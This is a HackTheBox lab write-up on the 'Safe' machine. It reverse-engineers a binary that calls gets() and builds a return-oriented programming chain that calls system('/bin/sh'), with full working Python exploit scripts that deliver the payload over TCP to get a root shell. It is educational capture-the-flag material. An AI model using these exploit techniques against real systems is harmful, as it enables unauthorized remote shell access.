HackTheBox Safe Pwn Write-Up

Safe is an easy difficulty Linux machine. In this write-up we will complete the binary exploitation section of the lab. We will examine a networked CLI application, find a buffer overflow vulnerability, then design and execute a return-oriented programming exploit to gain shell access to the server.

January 11, 2022
HTB | Write-Up | Pwn


Getting Started

At this point in the lab, Nmap has shown us an unknown service listening on TCP port 1337. We have also found what appears to be a copy of the service's executable, named myapp, hosted on a web server. We can download this copy of the binary and analyze it locally.

For the purpose of this write-up I will use socat to serve the application locally under the root account using sudo.

Connecting to the application/service with netcat shows us its simple functionality. First we do a quick scan with nmap to show that the port is open for connection. We connect to the service, and the first thing it sends us is system uptime information. Next we send it some test inputs (boxed in red) and receive some data back from the application (boxed in green).

It’s a little out of order, but the service seems to echo our input back to us, which is clearest with our test2 input. We can also infer that it runs uptime on the server and returns the output to us: we run that program in our local shell and compare the two outputs. Because the server application and our local shell are running on the same machine, the outputs are identical. This strongly suggests that the server application is running uptime.

Initial Inspection

After downloading the myapp executable from the web server, we run it to confirm it behaves the same way as the networked application. Run locally, it echoes our input back in the correct order. I suspect the earlier ordering was just a quirk of how we were serving the program with socat, so it shouldn’t be an issue going forward.

Running file shows that it is a 64-bit ELF executable that is dynamically linked and not stripped, so its symbol table is intact. Running ldd lists the shared libraries it loads. We can see that this binary was compiled for GNU/Linux and links against the system’s installed libc.

Let’s list out what we know so far to help us decide how to move forward:

There is a networked application running on the server

We can communicate with this application via TCP connection with netcat

This application runs a system command and returns the output

This application accepts, processes and returns user input in some way

We have access to the application binary for local analysis

The application was compiled for GNU/Linux and dynamically links to the C Standard Library

Buffer Overflow Vulnerability

The first thing we should try is to abuse the user input functionality, a very simple yet powerful attack vector. If there is no bounds checking or stack-smashing protection, we may be able to overrun the input buffer and overwrite adjacent memory on the call stack. That would be a stack buffer overflow. We can test for this simply by sending inputs of different sizes to the program. A segmentation fault indicates that we are writing outside the input buffer and that the program is likely vulnerable to this type of attack. Using Python to pipe input to the program, we trigger a segmentation fault with an input of 200 characters.
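The crash test can be scripted. Below is a minimal sketch. It assumes the downloaded binary sits at ./myapp in the current directory; the BINARY path and the probe sizes are my own choices, not taken from the lab. It relies on subprocess reporting a process killed by a signal as a negative return code, so a segmentation fault shows up as -SIGSEGV.

```python
#!/usr/bin/env python3
"""crash_probe.py: hypothetical helper, not part of the original exploit."""

import signal
import subprocess

BINARY = "./myapp"  # assumption: local copy of the binary in the current directory


def make_input(length: int) -> bytes:
    """Return `length` 'A' bytes followed by the newline that gets() stops at."""
    return b"A" * length + b"\n"


def crashed_with_segfault(returncode: int) -> bool:
    """subprocess reports death-by-signal as the negated signal number."""
    return returncode == -signal.SIGSEGV


def probe(sizes: tuple = (50, 100, 150, 200)) -> None:
    """Feed increasingly long inputs to the binary and report how each run ended."""
    for size in sizes:
        proc = subprocess.run([BINARY], input=make_input(size),
                              capture_output=True, timeout=5)
        status = "SIGSEGV" if crashed_with_segfault(proc.returncode) else proc.returncode
        print(f"{size:>4} bytes -> {status}")


if __name__ == "__main__":
    probe()
```

The program runs uptime before it reads input, so each run also writes the uptime line to the captured stdout. Only the return code matters here.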

Analyzing and Reversing

We will use gdb with the gef extension to analyze and debug the program. The checksec command reports which security protections are enabled in the binary. We can see that the NX (no-execute) bit is enabled. NX marks the stack as non-executable, so any instructions we write onto the call stack cannot be executed. There is also partial RELRO (Relocation Read-Only) protection, which reorders the internal data sections to protect them from being overwritten in the event of a buffer overflow.

“From an attackers point-of-view, partial RELRO makes almost no difference, other than it forces the GOT to come before the BSS in memory, eliminating the risk of a buffer overflows on a global variable overwriting GOT entries." ¹
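As a rough illustration of where these checksec results come from, the sketch below reads the program headers of a 64-bit little-endian ELF file with Python’s struct module. It infers NX from the flags on the PT_GNU_STACK header and the presence of RELRO from a PT_GNU_RELRO header. It does not read the dynamic section, so it cannot tell partial RELRO from full RELRO, which also needs the BIND_NOW flag. The default path ./myapp is an assumption.

```python
#!/usr/bin/env python3
"""elf_protections.py: simplified, hypothetical NX/RELRO check (not checksec itself)."""

import struct
import sys

PT_GNU_STACK = 0x6474E551
PT_GNU_RELRO = 0x6474E552
PF_X = 0x1  # segment is executable


def program_headers(data: bytes):
    """Yield (p_type, p_flags) for each program header of a 64-bit little-endian ELF."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a 64-bit little-endian ELF file")
    (e_phoff,) = struct.unpack_from("<Q", data, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x36)
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        yield p_type, p_flags


def nx_and_relro(data: bytes) -> dict:
    headers = list(program_headers(data))
    stack_flags = [flags for ptype, flags in headers if ptype == PT_GNU_STACK]
    # No PT_GNU_STACK header is treated as an executable stack here.
    nx = bool(stack_flags) and not (stack_flags[0] & PF_X)
    relro = any(ptype == PT_GNU_RELRO for ptype, _ in headers)
    return {"nx": nx, "relro_segment": relro}


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "./myapp"
    with open(path, "rb") as fh:
        print(nx_and_relro(fh.read()))
```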

The executable-space protection (NX bit) stops us from simply injecting and executing arbitrary code, so let’s dig deeper into the program and find another way we can leverage the buffer overflow. Running info functions lists the functions in the program as well as their virtual addresses.

puts, system, printf and gets are all dynamically linked from the libc shared library. The system function really catches my eye, as its purpose is to execute shell commands. I suspect this is what runs uptime, and we may find it useful for our exploit. main and test appear to be defined in the program itself. main is the usual entry point for C programs. Because the symbol table has not been stripped, we can also see the name of a user-defined function, test. Let’s disassemble the main function and look at the resulting assembly code.

This is a very simple program. We will re-create this in C below, but first I want to point out a few things. First and foremost this program is using the gets function to receive standard input from the user, which is a HUGE NO-NO. This is how we are able to buffer overflow the program’s input.

“The gets() function does not perform bounds checking, therefore this function is extremely vulnerable to buffer-overflow attacks. It cannot be used safely (unless the program runs in an environment which restricts what can appear on stdin). For this reason, the function has been deprecated in the third corrigendum to the C99 standard and removed altogether in the C11 standard. fgets() and gets_s() are the recommended replacements. Never use gets()." ²

Now that we’ve addressed the cause of the buffer overflow vulnerability, let’s explore how the call to the system function works. Instruction <+8> loads an address into the RDI register, then instruction <+15> calls the system function. Under the System V AMD64 calling convention used on Linux x86_64, RDI holds the first argument of a function call. For system, that argument is a pointer to the command string. Running the x/s command on that address shows that it points to the string “/usr/bin/uptime”. So the program is executing system("/usr/bin/uptime"), confirming our earlier assumption. Understanding how this works will be crucial to the development of our exploit.

I also want to point out that main never references the test function. Normally this could be because the function is an artifact of the development process, or dead code, but here I suspect it was created for us to use in our exploitation of this program. Let’s disassemble test and see what it does.

From what I can tell, this function doesn’t do anything useful on its own, aside from giving us something to use in our exploit:

1. It pushes the value in RBP onto the call stack and copies RSP into RBP (the standard function prologue).
2. It copies RSP into RDI, so RDI now holds the stack address of that saved value.
3. It jumps to the address stored in the R13 register.

The pop rbp and ret instructions that follow would restore RBP and return to the caller. They are never reached by falling through, because jmp r13 is an unconditional jump. I’m not sure how we could write this in plain C, but for our source reconstruction we can use the __asm__ keyword to write the assembly code directly into the C source.

Here is my attempt at re-creating the original C source code for this program with comments added to help understand what each line translates to in assembly code:

// my_source_myapp.c

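// gcc my_source_myapp.c -o my_source_myapp -fno-stack-protector -no-pie -w

#include <stdio.h>   // printf, puts
#include <stdlib.h>  // system

// gets() was removed in C11, so recent glibc headers may not declare it under
// the compiler's default standard; declare it here so the call still resolves.
char *gets(char *s);
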
int main(void) {

    char echo[112];  //..................................// sub    rsp,0x70

    system("/usr/bin/uptime");  //.......................// lea    rdi,[rip+0xe9a] # 0x402008
                                //.......................// call   0x401040 <system@plt>

    printf("\nWhat do you want me to echo back? ");  //..// lea    rdi,[rip+0xe9e] # 0x402018
                                                     //..// call   0x401050 <printf@plt>

    gets(echo);  //......................................// lea    rax,[rbp-0x70]
                 //......................................// mov    rdi,rax
                 //......................................// call   0x401060 <gets@plt>

    puts(echo);  //......................................// lea    rax,[rbp-0x70]
                 //......................................// mov    rdi,rax
                 //......................................// call   0x401030 <puts@plt>

    return 0;    //......................................// mov    eax,0x0
                 //......................................// leave
                 //......................................// ret
}

void test(void) {
    __asm__(
        "mov %rsp,%rdi\n\t"
        "jmpq *%r13"
    );
}

Compiling using gcc with the flags listed at the top creates nearly identical assembly code for me when inspected with objdump. There are a few unimportant discrepancies, but those are probably the result of minor compiler version/optimization differences and shouldn’t be an issue.

Debugging and Finding the Offset

Let’s run the program in gdb and set a breakpoint at the call to system so we can examine the registers at that point in execution. The address of the “/usr/bin/uptime” string has been loaded into the RDI register, and RIP (the instruction pointer) is at the call to system. The program is set up and ready to execute system("/usr/bin/uptime") when execution continues.

Now let’s halt execution and explore the buffer overflow vulnerability. We’ll first delete the previous breakpoint then use the pattern create command to generate a De Bruijn cyclic pattern of 200 bytes, as we know 200 bytes will cause a segmentation fault and overrun the input buffer used by gets (which we assigned the variable name echo to in our source re-creation). Then we run the program and use that pattern when prompted to supply our input.

As expected, we receive a segmentation fault. Now we can examine the state of the program at the fault and see where our input is being written.

The pattern search command shows how many bytes of input we need to reach the saved return address. When main’s ret instruction executes, RSP points at this saved return address, and ret pops it into RIP. Whatever we place there is where execution continues. Our pattern bytes do not form a valid (canonical) address, so the fault occurs at ret with RSP still pointing at them.

The search shows that 120 bytes of input reach the slot RSP points to at the crash. We could write any valid address into that slot, and main would return to it. Note that we are also overwriting the saved RBP value, which main’s leave instruction restores into the RBP register. Searching for the contents of RBP finds them 112 bytes past the start of our input buffer. That is 0x70 in hexadecimal, matching the sub rsp,0x70 and lea rax,[rbp-0x70] instructions in the disassembly.
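gef’s pattern create and pattern search commands do this work for us, but the idea behind them is small enough to sketch:

- Generate a de Bruijn sequence over the lowercase alphabet with order 8, so every 8-byte window of the pattern is unique.
- Locate a 64-bit value read from a register or the stack by packing it back into little-endian bytes and searching for it.

The alphabet and order are my own assumptions, and gef’s own defaults and implementation may differ.

```python
#!/usr/bin/env python3
"""cyclic.py: hypothetical de Bruijn pattern helper (not gef's code)."""

from itertools import islice

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"  # assumption: lowercase alphabet
ORDER = 8  # one 64-bit word: every 8-byte window is unique


def de_bruijn(alphabet: bytes = ALPHABET, n: int = ORDER):
    """Yield the de Bruijn sequence B(k, n) one byte at a time (Lyndon-word construction)."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t: int, p: int):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern_create(length: int) -> bytes:
    """First `length` bytes of the sequence (lazily generated)."""
    return bytes(islice(de_bruijn(), length))


def pattern_offset(pattern: bytes, value: int) -> int:
    """Offset of a 64-bit register/stack value inside the pattern, or -1 if absent."""
    return pattern.find(value.to_bytes(8, "little"))
```

For example, take the RBP value gdb shows at the crash and pass it as pattern_offset(pattern_create(200), rbp_value). This should return 112 for this binary if the numbers above hold.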

So let’s recap how our input is handled:

The first 112 bytes fill the input buffer on the stack (at rbp-0x70)

Bytes 113-120 overwrite the saved RBP value, which leave restores into the RBP register

Bytes 121-128 overwrite the saved return address, which ret pops into RIP

If we only send 112 bytes of junk followed by an 8 byte string, “deadbeef”, we can write that string into the RBP register.
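The layout above can be expressed as a small helper. In this sketch the constant 0x70 comes from the sub rsp,0x70 and lea rax,[rbp-0x70] instructions in main, and the helper name overflow is hypothetical. It makes explicit that the saved RBP sits right after the buffer and the saved return address right after that, which is why the offsets are 112 and 120.

```python
import struct

BUF_SIZE = 0x70                   # from `sub rsp,0x70` / `lea rax,[rbp-0x70]`
SAVED_RBP_OFFSET = BUF_SIZE       # 112: leave (mov rsp,rbp; pop rbp) reloads RBP from here
RET_ADDR_OFFSET = BUF_SIZE + 8    # 120: ret pops RIP from here


def overflow(saved_rbp: bytes, ret_addr: int) -> bytes:
    """Hypothetical helper: fill the buffer, then overwrite saved RBP and the return address."""
    if len(saved_rbp) != 8:
        raise ValueError("the saved RBP slot is exactly 8 bytes")
    return b"A" * BUF_SIZE + saved_rbp + struct.pack("<Q", ret_addr)
```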

Return-Oriented Programming

Three things make this program a prime candidate for return-oriented programming exploitation, or ROP for short: its limited binary protections, the buffer overflow in the gets call that handles user input, and easy access to the system function.

“The concept of ROP is simple but tricky. . . [W]e wil[l] be utilizing small instruction sequences available in either the binary or libraries linked to the application called gadgets. . . ROP gadgets are small instruction sequences ending with a “ret” instruction “c3”. Combining these gadgets will enable us to perform certain tasks and in the end conduct our attack . . . [I]nstead of returning to an address of a function . . . we will return to these ROP gadgets. . . The ROP gadget has to end with a “ret” to enable us to perform multiple sequences. Hence it is called return oriented." ³

With ROP we can find and chain together useful instruction sequences already present in the binary. In effect, we re-write the program to do whatever we want by rearranging its existing code. Our ultimate goal is to find ROP gadgets that redirect the program’s data and control flow so that the binary itself spawns a command-line shell.

ROPEmporium is a great resource to learn more about ROP exploitation and practice your exploit building skills.

Developing a ROP Exploit

Using Python, we can start to build a framework for our ROP exploit. Our Python test function constructs the input in three parts:

1. 112 bytes of “A”s.
2. Our 8-byte payload string, “deadbeef”.
3. The address of myapp’s test function, packed into 8-byte little-endian format with Python’s struct module.

The function then writes this input to a file named test_payload.txt.

#!/usr/bin/env python3
"""safe_pwn.py"""

import struct

# test
def test() -> None:
    """Test return to test function."""
    payload: bytes = (b"\x41" * 112)  # 112 bytes of 'A's to fill input buffer
    payload += b"deadbeef"  # string to write into rbp
    payload += struct.pack("<q", 0x401152)  # address of test function
    print("Our test payload:\n", payload)
    with open("test_payload.txt", "wb") as test_out:
        test_out.write(payload)


if __name__ == "__main__":
    test()

We run the new python script and generate our ROP test input.

Now we set a breakpoint at the address of myapp’s test function and run the program with our generated payload as input, using run < test_payload.txt. At the breakpoint, RBP now contains the string “deadbeef” and RIP contains the address of test, so test is the next subroutine the program will execute.

Stepping through test one instruction at a time (ni in gdb) shows how the function sets up the call stack. By this point, main’s leave instruction has already restored our “deadbeef” string into RBP. The function prologue pushes the value in RBP onto the stack, decrementing RSP by 8 bytes. It then copies RSP into RBP, so both registers now hold the stack address where “deadbeef” is stored. Directly after the prologue, test copies RSP into the RDI register. Now all three registers (RBP, RSP and RDI) point to the string “deadbeef”.

After copying the stack address of “deadbeef” into RDI, test executes jmp r13. Right now R13 doesn’t contain anything useful. If it held a valid function address, test would jump to that function and execute it.

So we need to get a useful string address into RDI and the address of the system function into R13. Under the System V x86-64 calling convention, system then runs with our payload string as its argument. If RDI points to the string “/bin/sh” when we jump to system, we will spawn a command-line shell on the host machine.

This is where the ROP method comes in. A ROP gadget is a machine instruction sequence accessible to the program that ends with a return instruction. If we can find a gadget that pops a value off the call stack into R13, we can load the address of the system function into that register, and test will then jump to it. We could search for a gadget manually, but a better option is the Python tool ropper. Using it within gdb-gef, we can search for a gadget containing “pop r13” with the command ropper --search "pop r13".

ropper has found a gadget we can use at the virtual address 0x401206. Besides R13, this gadget also pops R14 and R15 before it executes the return instruction. These extra pops are not an issue; we can write 0x0 to those registers, since our exploit doesn’t use them.
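ropper decodes instructions to find gadgets of many shapes. For one specific gadget, a much cruder byte search is enough to show the idea: pop r13, pop r14, pop r15 and ret encode as 41 5d, 41 5e, 41 5f and c3. The sketch below searches the executable PT_LOAD segments of a 64-bit little-endian ELF for those exact bytes and converts each hit to a virtual address. The default path ./myapp is an assumption. Unlike ropper, this will miss any gadget encoded differently.

```python
#!/usr/bin/env python3
"""find_gadget.py: hypothetical exact-byte gadget search (not how ropper works)."""

import struct
import sys

PT_LOAD = 1
PF_X = 1
# pop r13 ; pop r14 ; pop r15 ; ret  ->  41 5d  41 5e  41 5f  c3
POP_R13_R14_R15_RET = bytes.fromhex("415d415e415fc3")


def exec_segments(data: bytes):
    """Yield (file_offset, vaddr, size) for executable PT_LOAD segments of a 64-bit LE ELF."""
    (e_phoff,) = struct.unpack_from("<Q", data, 0x20)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 0x36)
    for i in range(e_phnum):
        p_type, p_flags, p_offset, p_vaddr, _paddr, p_filesz = struct.unpack_from(
            "<IIQQQQ", data, e_phoff + i * e_phentsize)
        if p_type == PT_LOAD and p_flags & PF_X:
            yield p_offset, p_vaddr, p_filesz


def find_gadget(data: bytes, gadget: bytes = POP_R13_R14_R15_RET) -> list:
    """Return the virtual address of every occurrence of `gadget` in executable segments."""
    hits = []
    for offset, vaddr, size in exec_segments(data):
        segment = data[offset:offset + size]
        start = segment.find(gadget)
        while start != -1:
            hits.append(vaddr + start)
            start = segment.find(gadget, start + 1)
    return hits


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "./myapp"
    with open(path, "rb") as fh:
        for addr in find_gadget(fh.read()):
            print(hex(addr))
```

If the ropper result above is correct, 0x401206 should be among the addresses this prints for myapp.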

Testing Our Exploit Method

Let’s list out what we need to send to the program in order to set up a shell command call for /bin/sh:

112 bytes of junk to fill the input buffer

8-byte string for our system argument, overwriting the saved RBP value

Address of our ROP gadget (pop r13; pop r14; pop r15; ret), overwriting the saved return address

Address of the system function to write to R13

0x0 to write to R14

0x0 to write to R15

Address of the test function, which the gadget’s ret will jump to
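To check the list above before touching gdb, the chain can be walked through in a toy model. The sketch below is not an emulator. It models only main’s leave and ret, the pop r13; pop r14; pop r15; ret gadget, and the first instructions of test, over a bytearray standing in for the stack. The addresses are the ones from this write-up, and the stack base address buf is an arbitrary assumption.

```python
import struct

SYSTEM_PLT = 0x401040  # system@plt, per the write-up
GADGET = 0x401206      # pop r13 ; pop r14 ; pop r15 ; ret, per ropper
TEST_FN = 0x401152     # myapp's test function


def q(value: int) -> bytes:
    """Pack a 64-bit value little-endian, as the stack stores it."""
    return struct.pack("<Q", value)


def build_chain(arg: bytes = b"/bin/sh\x00") -> bytes:
    """Same layout as the list above; arg must fit the 8-byte saved-RBP slot."""
    if len(arg) != 8:
        raise ValueError("argument must be exactly 8 bytes")
    return b"A" * 112 + arg + q(GADGET) + q(SYSTEM_PLT) + q(0) + q(0) + q(TEST_FN)


def simulate(payload: bytes, buf: int = 0x7FFFFFFFE000) -> dict:
    """Toy model of main's epilogue -> gadget -> test(). Not an emulator."""
    stack = bytearray(payload)  # stack memory, starting at the gets() buffer

    def pop() -> int:
        nonlocal rsp
        value = struct.unpack_from("<Q", stack, rsp - buf)[0]
        rsp += 8
        return value

    rbp = buf + 0x70                      # main's frame: buffer lives at rbp-0x70
    rsp = rbp                             # leave: mov rsp, rbp
    rbp = pop()                           # leave: pop rbp -> our 8-byte string
    rip = pop()                           # main: ret
    if rip != GADGET:
        raise RuntimeError("main did not return into the gadget")
    r13, r14, r15 = pop(), pop(), pop()   # gadget: pop r13 ; pop r14 ; pop r15
    rip = pop()                           # gadget: ret
    if rip != TEST_FN:
        raise RuntimeError("gadget did not return into test")
    rsp -= 8                              # test: push rbp
    struct.pack_into("<Q", stack, rsp - buf, rbp)
    rbp = rsp                             # test: mov rbp, rsp
    rdi = rsp                             # test: mov rdi, rsp
    rip = r13                             # test: jmp r13
    arg = bytes(stack[rdi - buf:]).split(b"\x00", 1)[0]  # C string RDI points at
    return {"rip": rip, "rdi": rdi, "rbp": rbp, "arg": arg, "r14": r14, "r15": r15}
```

The model also shows why "/bin/sh\x00" works as the argument: it is exactly 8 bytes, so it fits the saved-RBP slot whose contents test pushes back onto the stack and points RDI at.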

We will adapt our previous python test function to include our new payload instructions and write the data to the file payload.txt.

#!/usr/bin/env python3
"""safe_pwn.py"""

import struct

# payload
def exploit() -> bytes:
    """Build our payload."""
    payload: bytes = (b"\x41" * 112)  # overflow junk
    payload += b"/bin/sh\x00"  # rbp : string argument for system function
    payload += struct.pack("<q", 0x401206)  # pop r13 ; pop r14 ; pop r15 ; ret
    payload += struct.pack("<q", 0x401040)  # r13 -> system
    payload += struct.pack("<q", 0x000000)  # r14 : 0x0
    payload += struct.pack("<q", 0x000000)  # r15 : 0x0
    payload += struct.pack("<q", 0x401152)  # test function

    print("Our payload:\n", payload)
    with open("payload.txt", "wb") as payload_out:
        payload_out.write(payload)
    return payload


if __name__ == "__main__":
    exploit()

We run the python script and generate our ROP exploit input.

Again we set a breakpoint at test and run the program with our generated payload as input.

When we hit the breakpoint and step through the subroutine, RDI now holds the stack address of the string “/bin/sh” and R13 holds the address of the system function. The jmp r13 instruction will therefore transfer control (RIP) to system. The program is now ready to execute system("/bin/sh").

Running the program outside of gdb and piping our payload to it as input gives us command-line shell access. Our exploit method is successful.

Exploiting the Networked Application

Piping our exploit payload into the program locally gave us shell access on our own machine, confirming that the exploit works against the binary. Now we need to extend the script to connect to the networked application on the server and communicate with it. Instead of writing the payload to a file as before, we can use Python’s telnetlib module. It lets us open a TCP connection to the server application and interact with it, emulating a very dumb Telnet client.

#!/usr/bin/env python3
"""safe_pwn.py"""

import struct
from telnetlib import Telnet

HOST: str = "127.0.0.1"
PORT: int = 1337


# payload
def exploit() -> bytes:
    """Build our payload."""
    payload: bytes = (b"\x41" * 112)  # overflow junk
    payload += b"/bin/sh\x00"  # rbp : string argument for system function
    payload += struct.pack("<q", 0x401206)  # pop r13 ; pop r14 ; pop r15 ; ret
    payload += struct.pack("<q", 0x401040)  # r13 -> system
    payload += struct.pack("<q", 0x000000)  # r14 -> 0x0
    payload += struct.pack("<q", 0x000000)  # r15 -> 0x0
    payload += struct.pack("<q", 0x401152)  # test function
    return payload


def main() -> None:
    """Main function. Connect and interact
    with server application."""
    try:
        t_n: Telnet = Telnet(HOST, PORT)
        t_n.read_until(b"\n")
        t_n.write(exploit() + b"\n")
        print("\n[#] SYSTEM PWNED!! [#]\n")
        t_n.interact()
    except KeyboardInterrupt:
        print("\n\n[#] DISCONNECTING [#]\n")
        quit()
    except ConnectionRefusedError:
        print('\n[!] COULD NOT CONNECT TO SERVER [!]\n')
        quit()


if __name__ == "__main__":
    main()

The script establishes a telnet connection to the server application and once it receives a newline control character, sends our payload bytes followed by a newline, simulating a return key-press. It then emulates a minimal telnet client allowing us to run commands and receive the output. We run whoami and hostname to show that we are running a command-line shell on the server with root account privileges.
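One caveat for reusing this script: telnetlib was deprecated in Python 3.11 and removed in Python 3.13 (PEP 594), so the import fails on current interpreters. Below is a minimal sketch of the same flow using only the socket and selectors modules. The helper names deliver and interact are hypothetical, and the payload is the one built above. The stdin relay assumes a POSIX system, because select-based polling of stdin does not work on Windows.

```python
#!/usr/bin/env python3
"""safe_pwn_socket.py: hypothetical telnetlib-free variant of safe_pwn.py."""

import os
import selectors
import socket
import struct
import sys

HOST: str = "127.0.0.1"
PORT: int = 1337


def exploit() -> bytes:
    """Same payload as safe_pwn.py."""
    payload = b"\x41" * 112                  # overflow junk
    payload += b"/bin/sh\x00"                # saved rbp: argument for system
    payload += struct.pack("<Q", 0x401206)   # pop r13 ; pop r14 ; pop r15 ; ret
    payload += struct.pack("<Q", 0x401040)   # r13 -> system
    payload += struct.pack("<Q", 0)          # r14
    payload += struct.pack("<Q", 0)          # r15
    payload += struct.pack("<Q", 0x401152)   # test function
    return payload


def deliver(conn: socket.socket, payload: bytes) -> bytes:
    """Read the uptime banner up to the first newline, then send payload + newline."""
    banner = b""
    while not banner.endswith(b"\n"):
        chunk = conn.recv(1)  # one byte at a time so nothing past the newline is consumed
        if not chunk:
            raise ConnectionError("server closed the connection")
        banner += chunk
    conn.sendall(payload + b"\n")
    return banner


def interact(conn: socket.socket) -> None:
    """Relay stdin to the socket and socket data to stdout until either side closes."""
    sel = selectors.DefaultSelector()
    sel.register(conn, selectors.EVENT_READ)
    sel.register(sys.stdin, selectors.EVENT_READ)
    while True:
        for key, _ in sel.select():
            if key.fileobj is conn:
                data = conn.recv(4096)
                if not data:
                    return
                sys.stdout.buffer.write(data)
                sys.stdout.flush()
            else:
                data = os.read(sys.stdin.fileno(), 4096)
                if not data:
                    return
                conn.sendall(data)


if __name__ == "__main__":
    try:
        with socket.create_connection((HOST, PORT)) as sock:
            deliver(sock, exploit())
            print("\n[#] SYSTEM PWNED!! [#]\n")
            interact(sock)
    except ConnectionRefusedError:
        print("\n[!] COULD NOT CONNECT TO SERVER [!]\n")
    except KeyboardInterrupt:
        print("\n\n[#] DISCONNECTING [#]\n")
```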

Conclusion

This was a very trivial exploit performed on a useless, weakly secured, poorly written and poorly implemented application. However contrived the example, it let us touch on many concepts and methods that apply to real-world exploit development: binary inspection, binary security protections, buffer overflow vulnerabilities, reverse engineering C program assembly code, program debugging, return-oriented programming, and binary exploit development in Python. I enjoyed this section of the lab and learned a lot while completing it, as well as while writing this post and explaining the process.

¹ binary-exploitation/relocation-read-only, ctf101.org.
² gets, gets_s, cppreference.com.
³ Return-Oriented-Programming (ROP FTW), Saif El-Sherei.